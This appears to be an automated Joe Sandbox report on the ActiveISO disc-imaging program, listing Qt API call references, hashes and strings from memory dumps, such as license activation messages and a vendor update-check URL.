                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$V0@@$?from$ArrayAscii_helper@ByteData@Typed$Array@@$?remove@CaseChar@@@Device@@File@@Lower@Qt@@@Sensitivity@$File$?arg@?index?replace@?resize@Char@@End@Latin1String@@@V1@0$?append@?application?close@?data@?exists@?open@?readApplication@@Array@@@Array@@_CoreDevice@@@@@Dir@@DrivesFlag@Flags@Latin1@Line@LogicalModeNativeOpenPath@Separators@Utf8@V1@@V2@@
                                                                                                                  • String ID: %1:\bootdisk.key$%1:\settings.ini$BOOTDISK.KEY$settings.ini
                                                                                                                  • API String ID: 2761221945-88892507
                                                                                                                  • Opcode ID: ddfbd4b9e97c8c97d029bf7e039e387552f2a5e67d3036aa1fd7ae592b5af0cb
                                                                                                                  • Instruction ID: 57b09d536694c2afe84a6fa80a149375e99799fd397cdb745e90df16c87435bc
                                                                                                                  • Opcode Fuzzy Hash: ddfbd4b9e97c8c97d029bf7e039e387552f2a5e67d3036aa1fd7ae592b5af0cb
                                                                                                                  • Instruction Fuzzy Hash: 2B816F22E24952A9FB00DFB0DC525EC2332FB55B69B850132E95EB29A4DF38D54DC384
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Char@@@$?set$?arg@?fromArrayAscii_helper@Char@@Data@Edit@@Latin1LineTyped$String@@@Text@$?text@Enabled@Widget@@$Array@@ByteDate@@Label@@Settings@@String@V0@@V2@@
                                                                                                                  • String ID: %1 version of <i>%2</i>%3 registered on %4$&trade;$MMM dd, yyyy
                                                                                                                  • API String ID: 1526640095-1549470602
                                                                                                                  • Opcode ID: fcd71be3aca1c866d893cd486e829ff3e39b172b8fb10cd3c3b7f63fd7e1f6dc
                                                                                                                  • Instruction ID: ca93236fa4b7af01440e73fb4b63696bad6718a6d45205289b00e015c5a79c69
                                                                                                                  • Opcode Fuzzy Hash: fcd71be3aca1c866d893cd486e829ff3e39b172b8fb10cd3c3b7f63fd7e1f6dc
                                                                                                                  • Instruction Fuzzy Hash: DA811F32A14A029AF710DF75E8962AC3362FB95F59F855131DA0EB3AA4DF3CE548C344
                                                                                                                  APIs
                                                                                                                  • ?toPlainText@QPlainTextEdit@@QEBA?AVQString@@XZ.QT5WIDGETS ref: 00007FF6537576D1
                                                                                                                  • ?setText@QLineEdit@@QEAAXAEBVQString@@@Z.QT5WIDGETS ref: 00007FF653757709
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653757714
                                                                                                                  • ?wizard@QWizardPage@@IEBAPEAVQWizard@@XZ.QT5WIDGETS ref: 00007FF65375771D
                                                                                                                  • ?disconnect@QObject@@SA_NPEBV1@PEBD01@Z.QT5CORE ref: 00007FF653757737
                                                                                                                  • ?wizard@QWizardPage@@IEBAPEAVQWizard@@XZ.QT5WIDGETS ref: 00007FF653757740
                                                                                                                  • ?setOption@QWizard@@QEAAXW4WizardOption@1@_N@Z.QT5WIDGETS ref: 00007FF653757751
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65375793F
                                                                                                                    • Part of subcall function 00007FF653756E00: ??0QNetworkAccessManager@@QEAA@PEAVQObject@@@Z.QT5NETWORK ref: 00007FF653756E48
                                                                                                                    • Part of subcall function 00007FF653756E00: ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FF653756E89
                                                                                                                    • Part of subcall function 00007FF653756E00: ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FF653756E94
                                                                                                                    • Part of subcall function 00007FF653756E00: ?wizard@QWizardPage@@IEBAPEAVQWizard@@XZ.QT5WIDGETS ref: 00007FF653756E9D
                                                                                                                    • Part of subcall function 00007FF653756E00: ?setParent@QWidget@@QEAAXPEAV1@@Z.QT5WIDGETS ref: 00007FF653756EAD
                                                                                                                    • Part of subcall function 00007FF653756E00: ?toPlainText@QPlainTextEdit@@QEBA?AVQString@@XZ.QT5WIDGETS ref: 00007FF653756EE0
                                                                                                                    • Part of subcall function 00007FF653756E00: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653756EF5
                                                                                                                    • Part of subcall function 00007FF653756E00: ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE ref: 00007FF653756F07
                                                                                                                    • Part of subcall function 00007FF653756E00: ?arg@QString@@QEBA?AV1@AEBV1@HVQChar@@@Z.QT5CORE ref: 00007FF653756F25
                                                                                                                    • Part of subcall function 00007FF653756E00: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653756F31
                                                                                                                    • Part of subcall function 00007FF653756E00: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653756F3D
                                                                                                                    • Part of subcall function 00007FF653756E00: ??0QUrl@@QEAA@AEBVQString@@W4ParsingMode@0@@Z.QT5CORE ref: 00007FF653756F50
                                                                                                                    • Part of subcall function 00007FF653756E00: ??0QNetworkRequest@@QEAA@AEBVQUrl@@@Z.QT5NETWORK ref: 00007FF653756F5F
                                                                                                                    • Part of subcall function 00007FF653756E00: ?get@QNetworkAccessManager@@QEAAPEAVQNetworkReply@@AEBVQNetworkRequest@@@Z.QT5NETWORK ref: 00007FF653756F70
                                                                                                                    • Part of subcall function 00007FF653756E00: ??1QNetworkRequest@@QEAA@XZ.QT5NETWORK ref: 00007FF653756F82
                                                                                                                    • Part of subcall function 00007FF653756E00: ??1QUrl@@QEAA@XZ.QT5CORE ref: 00007FF653756F8E
                                                                                                                    • Part of subcall function 00007FF653756E00: ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FF653756FBE
                                                                                                                    • Part of subcall function 00007FF653756E00: ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FF653756FC9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Object@@$Network$Connection@MetaPlainWizardWizard@@$?set?wizard@Edit@@Page@@Text@$?connect@AccessChar@@@ConnectionManager@@Qt@@@Request@@TextType@Url@@$?arg@?disconnect@?from?get@ArrayAscii_helper@Char@@D01@Data@Latin1LineMode@0@@Object@@@Option@Option@1@_Parent@ParsingReply@@Request@@@String@@@TypedUrl@@@V1@@Widget@@
                                                                                                                  • String ID: 1manualActivate()$2customButtonClicked(int)$<b>%1</b>: $<font color=red>%1</font>$Error
                                                                                                                  • API String ID: 1240172703-1322433970
                                                                                                                  • Opcode ID: 6655710ddcfb939ddb1b373ab5207a79f0099a47ff3945e25b1493d25e0024d3
                                                                                                                  • Instruction ID: 6220468cb2625f26ada8717d745bee960035d3c7fa8867e183ecee9d400f7ea1
                                                                                                                  • Opcode Fuzzy Hash: 6655710ddcfb939ddb1b373ab5207a79f0099a47ff3945e25b1493d25e0024d3
                                                                                                                  • Instruction Fuzzy Hash: D6817F22E24A419AEB00DB75D8962BC2372FB89F99F495031DA1EB3B64DF3CD459C344
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Char@@@Widget@@$?hide@$?fromArrayAscii_helper@Data@Typed$String@@@$?arg@Char@@Latin1Settings@@$?remove@$?setLabel@@Text@$?show@?tr@MetaObject@@
                                                                                                                  • String ID: &trade;$&trade;$<b><i>%1</i>%2 registration has been successfully removed.$<i>%1</i>%2 license has been successfully deactivated and the license is available for re-using.
                                                                                                                  • API String ID: 1229772595-2148364450
                                                                                                                  • Opcode ID: 7e9de040e9f5d4ed5be6517679f734533e915559fbfebd4bb084fc0545626084
                                                                                                                  • Instruction ID: 66c687fb72b9fb622a8189a5e830a9bb67893eeff49936934cb23aa30f5e5ee3
                                                                                                                  • Opcode Fuzzy Hash: 7e9de040e9f5d4ed5be6517679f734533e915559fbfebd4bb084fc0545626084
                                                                                                                  • Instruction Fuzzy Hash: AF61BF22A28A82D3E750DB21E8922A97362FB85F51F445132DA5FA3A74DF3CD45CC744
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Char@@@$Object@@$?arg@?fromChar@@Debug@@Latin1MetaString@@@$?setArrayAscii_helper@Connection@Data@Label@@Logger@@MessageText@Typed$?append@?connect@?debug@?tr@ConnectionQt@@@Type@Utf8@V1@@
                                                                                                                  • String ID: 1DownloadInfo(QString)$2DownloadInfo(QString)$<font color=red><b>Error:</b></font> $Checking download info...$Currently installed version has not been registered. Updates are not available!$http://www.lsoft.net/act/update.aspx?pid=%1&ver=%2&os=%3
                                                                                                                  • API String ID: 1247585728-602274440
                                                                                                                  • Opcode ID: 6c3b2c37ec7db860a9838ae77545f8f9f0c17fc4f46ac3419267a90de748d3fb
                                                                                                                  • Instruction ID: eef008d8ad76ddfb918e15e9a6ee457be40e6cd13f0b4b0bf8bbb9da1cd38ce6
                                                                                                                  • Opcode Fuzzy Hash: 6c3b2c37ec7db860a9838ae77545f8f9f0c17fc4f46ac3419267a90de748d3fb
                                                                                                                  • Instruction Fuzzy Hash: A1816332F28A4295FB109B64E8922B82362FF45F85F491131D95EF7AA4EF3CE508C354
                                                                                                                  APIs
                                                                                                                  • ?readAll@QIODevice@@QEAA?AVQByteArray@@XZ.QT5CORE ref: 00007FF6537572C1
                                                                                                                  • ??0QString@@QEAA@AEBVQByteArray@@@Z.QT5CORE ref: 00007FF6537572D0
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653757333
                                                                                                                  • ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE ref: 00007FF653757343
                                                                                                                  • ?arg@QString@@QEBA?AV1@AEBV1@HVQChar@@@Z.QT5CORE ref: 00007FF65375735F
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653757374
                                                                                                                  • ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE ref: 00007FF653757384
                                                                                                                  • ?arg@QString@@QEBA?AV1@AEBV1@HVQChar@@@Z.QT5CORE ref: 00007FF6537573A0
                                                                                                                    • Part of subcall function 00007FF65371F860: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF65371F87D
                                                                                                                    • Part of subcall function 00007FF65371F860: ?append@QString@@QEAAAEAV1@AEBV1@@Z.QT5CORE ref: 00007FF65371F891
                                                                                                                  • ?setText@QLabel@@QEAAXAEBVQString@@@Z.QT5WIDGETS ref: 00007FF6537573D9
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537573E4
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537573EF
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537573FA
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653757405
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653757410
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65375741B
                                                                                                                    • Part of subcall function 00007FF6537570D0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF653757105
                                                                                                                  • ?setText@QLabel@@QEAAXAEBVQString@@@Z.QT5WIDGETS ref: 00007FF653757456
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653757461
                                                                                                                  • ?wizard@QWizardPage@@IEBAPEAVQWizard@@XZ.QT5WIDGETS ref: 00007FF65375746A
                                                                                                                  • ?disconnect@QObject@@SA_NPEBV1@PEBD01@Z.QT5CORE ref: 00007FF653757484
                                                                                                                  • ?wizard@QWizardPage@@IEBAPEAVQWizard@@XZ.QT5WIDGETS ref: 00007FF65375748D
                                                                                                                  • ?setOption@QWizard@@QEAAXW4WizardOption@1@_N@Z.QT5WIDGETS ref: 00007FF65375749E
                                                                                                                    • Part of subcall function 00007FF653742380: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF65374239B
                                                                                                                    • Part of subcall function 00007FF653742380: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF6537423BF
                                                                                                                    • Part of subcall function 00007FF653742380: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF6537423D6
                                                                                                                    • Part of subcall function 00007FF653742380: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF6537423EC
                                                                                                                    • Part of subcall function 00007FF653742380: ?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z.QT5CORE ref: 00007FF653742409
                                                                                                                    • Part of subcall function 00007FF653742380: ??0QVariant@@QEAA@AEBVQString@@@Z.QT5CORE ref: 00007FF653742417
                                                                                                                    • Part of subcall function 00007FF653742380: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF65374242A
                                                                                                                    • Part of subcall function 00007FF653742380: ?setValue@QSettings@@QEAAXAEBVQString@@AEBVQVariant@@@Z.QT5CORE ref: 00007FF65374244A
                                                                                                                    • Part of subcall function 00007FF653742380: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653742459
                                                                                                                    • Part of subcall function 00007FF653742380: ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FF653742465
                                                                                                                    • Part of subcall function 00007FF653742380: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653742471
                                                                                                                    • Part of subcall function 00007FF653742380: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653742480
                                                                                                                    • Part of subcall function 00007FF653742380: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65374248C
                                                                                                                    • Part of subcall function 00007FF653742380: ??1QSettings@@UEAA@XZ.QT5CORE ref: 00007FF653742498
                                                                                                                  • ?setPlainText@QPlainTextEdit@@QEAAXAEBVQString@@@Z.QT5WIDGETS ref: 00007FF6537574C3
                                                                                                                  • ?setText@QLineEdit@@QEAAXAEBVQString@@@Z.QT5WIDGETS ref: 00007FF6537574DA
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537574E5
                                                                                                                    • Part of subcall function 00007FF653757B80: ?tr@QMetaObject@@QEBA?AVQString@@PEBD0H@Z.QT5CORE ref: 00007FF653757BA6
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537574F8
                                                                                                                  • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FF653757503
                                                                                                                    • Part of subcall function 00007FF6537454D0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF6537454FE
                                                                                                                    • Part of subcall function 00007FF6537454D0: ?indexOf@QString@@QEBAHAEBV1@HW4CaseSensitivity@Qt@@@Z.QT5CORE ref: 00007FF653745518
                                                                                                                    • Part of subcall function 00007FF6537454D0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653745527
                                                                                                                    • Part of subcall function 00007FF6537454D0: ?mid@QString@@QEBA?AV1@HH@Z.QT5CORE ref: 00007FF653745540
                                                                                                                    • Part of subcall function 00007FF6537454D0: ??4QByteArray@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE ref: 00007FF653745550
                                                                                                                    • Part of subcall function 00007FF6537454D0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65374555A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?fromArrayAscii_helper@Data@Typed$?setByte$Array@@String@@@$Char@@@Text@$V0@@WizardWizard@@$?arg@?wizard@CaseChar@@Edit@@Label@@Latin1Object@@Page@@PlainQt@@@Sensitivity@Settings@@Variant@@$?append@?disconnect@?index?mid@?read?replace@?tr@All@Array@@@D01@Device@@LineMetaOption@Option@1@_TextV0@$$V1@0V1@@Value@Variant@@@
                                                                                                                  • String ID: 1manualActivate()$2customButtonClicked(int)$<b>%1</b>: $<font color=red>%1</font>$Error
                                                                                                                  • API String ID: 244929320-1322433970
                                                                                                                  • Opcode ID: 70ec05770b60665aef612ab2fcadc770b426b61de6c27baae61611dfceb05584
                                                                                                                  • Instruction ID: 187cfdbd77a48e91646cd9087a091e917fadaba4398522159c97afa4c4de2df6
                                                                                                                  • Opcode Fuzzy Hash: 70ec05770b60665aef612ab2fcadc770b426b61de6c27baae61611dfceb05584
                                                                                                                  • Instruction Fuzzy Hash: B2717122E24A42DAEB00DF60D8961EC2372FB45F99F495031DA1EB3AA4DF3CD549C344
                                                                                                                  APIs
                                                                                                                  • ?isRunning@QThread@@QEBA_NXZ.QT5CORE ref: 00007FF65371B83C
                                                                                                                  • Sleep.KERNEL32 ref: 00007FF65371B855
                                                                                                                  • ?isRunning@QThread@@QEBA_NXZ.QT5CORE ref: 00007FF65371B862
                                                                                                                  • ?stop@QTimer@@QEAAXXZ.QT5CORE ref: 00007FF65371B879
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF65371B88B
                                                                                                                  • ?setText@QAbstractButton@@QEAAXAEBVQString@@@Z.QT5WIDGETS ref: 00007FF65371B89F
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65371B8AB
                                                                                                                  • ?setEnabled@QWidget@@QEAAX_N@Z.QT5WIDGETS ref: 00007FF65371B8B7
                                                                                                                  • ?setEnabled@QWidget@@QEAAX_N@Z.QT5WIDGETS ref: 00007FF65371B8C3
                                                                                                                  • ?setEnabled@QWidget@@QEAAX_N@Z.QT5WIDGETS ref: 00007FF65371B8CF
                                                                                                                  • ?setEnabled@QWidget@@QEAAX_N@Z.QT5WIDGETS ref: 00007FF65371B8DE
                                                                                                                  • ?setEnabled@QWidget@@QEAAX_N@Z.QT5WIDGETS ref: 00007FF65371B8ED
                                                                                                                  • ?setEnabled@QWidget@@QEAAX_N@Z.QT5WIDGETS ref: 00007FF65371B8FC
                                                                                                                  • ?setEnabled@QWidget@@QEAAX_N@Z.QT5WIDGETS ref: 00007FF65371B90B
                                                                                                                  • ?setEnabled@QWidget@@QEAAX_N@Z.QT5WIDGETS ref: 00007FF65371B935
                                                                                                                  • ?setEnabled@QWidget@@QEAAX_N@Z.QT5WIDGETS ref: 00007FF65371B944
                                                                                                                  • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF65371B98C
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF65371B9BE
                                                                                                                  • ?critical@QMessageBox@@SA?AW4StandardButton@1@PEAVQWidget@@AEBVQString@@1V?$QFlags@W4StandardButton@QMessageBox@@@@W421@@Z.QT5WIDGETS ref: 00007FF65371B9EA
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65371B9F6
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF65371BA18
                                                                                                                    • Part of subcall function 00007FF65371B670: ??0QTreeWidgetItem@@QEAA@PEAVQTreeWidget@@H@Z.QT5WIDGETS ref: 00007FF65371B6A7
                                                                                                                    • Part of subcall function 00007FF65371B670: ?setIcon@QTreeWidgetItem@@QEAAXHAEBVQIcon@@@Z.QT5WIDGETS ref: 00007FF65371B6E1
                                                                                                                    • Part of subcall function 00007FF65371B670: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF65371B6F3
                                                                                                                    • Part of subcall function 00007FF65371B670: ?currentDateTime@QDateTime@@SA?AV1@XZ.QT5CORE ref: 00007FF65371B703
                                                                                                                    • Part of subcall function 00007FF65371B670: ?toString@QDateTime@@QEBA?AVQString@@AEBV2@@Z.QT5CORE ref: 00007FF65371B717
                                                                                                                    • Part of subcall function 00007FF65371B670: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF65371B72C
                                                                                                                    • Part of subcall function 00007FF65371B670: ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE ref: 00007FF65371B744
                                                                                                                    • Part of subcall function 00007FF65371B670: ?arg@QString@@QEBA?AV1@AEBV1@HVQChar@@@Z.QT5CORE ref: 00007FF65371B765
                                                                                                                    • Part of subcall function 00007FF65371B670: ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE ref: 00007FF65371B778
                                                                                                                    • Part of subcall function 00007FF65371B670: ?arg@QString@@QEBA?AV1@AEBV1@HVQChar@@@Z.QT5CORE ref: 00007FF65371B794
                                                                                                                    • Part of subcall function 00007FF65371B670: ?setText@QTreeWidgetItem@@QEAAXHAEBVQString@@@Z.QT5WIDGETS ref: 00007FF65371B7A3
                                                                                                                    • Part of subcall function 00007FF65371B670: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65371B7AF
                                                                                                                    • Part of subcall function 00007FF65371B670: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65371B7BB
                                                                                                                    • Part of subcall function 00007FF65371B670: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65371B7CA
                                                                                                                    • Part of subcall function 00007FF65371B670: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65371B7D6
                                                                                                                    • Part of subcall function 00007FF65371B670: ??1QDateTime@@QEAA@XZ.QT5CORE ref: 00007FF65371B7E2
                                                                                                                    • Part of subcall function 00007FF65371B670: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65371B7EE
                                                                                                                    • Part of subcall function 00007FF65371B670: ?setCurrentItem@QTreeWidget@@QEAAXPEAVQTreeWidgetItem@@@Z.QT5WIDGETS ref: 00007FF65371B7FE
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF65371BA81
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF65371BA98
                                                                                                                  • ?information@QMessageBox@@SA?AW4StandardButton@1@PEAVQWidget@@AEBVQString@@1V?$QFlags@W4StandardButton@QMessageBox@@@@W421@@Z.QT5WIDGETS ref: 00007FF65371BABE
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65371BACA
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65371BAD6
